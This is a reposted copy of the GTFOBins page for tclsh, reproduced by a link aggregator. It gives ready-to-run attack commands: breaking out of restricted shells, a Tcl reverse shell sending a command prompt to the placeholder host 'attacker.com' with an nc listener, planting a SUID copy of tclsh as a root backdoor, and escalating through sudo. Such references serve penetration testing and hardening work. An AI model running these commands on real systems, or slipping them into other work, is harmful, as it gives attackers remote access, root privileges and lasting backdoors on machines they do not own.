2

tclsh | GTFOBins

 2 years ago
source link: https://gtfobins.github.io/gtfobins/tclsh/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

tclsh | GTFOBins

.. / tclsh

Shell

It can be used to break out from restricted environments by spawning an interactive system shell.

  • tclsh
    exec /bin/sh <@stdin >@stdout 2>@stderr

Non-interactive reverse shell

It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.

  • Run nc -l -p 12345 on the attacker box to receive the shell.

    export RHOST=attacker.com
    export RPORT=12345
    echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

  • sudo install -m =xs $(which tclsh) .
    
    ./tclsh
    exec /bin/sh -p <@stdin >@stdout 2>@stderr

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

  • sudo tclsh
    exec /bin/sh <@stdin >@stdout 2>@stderr

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK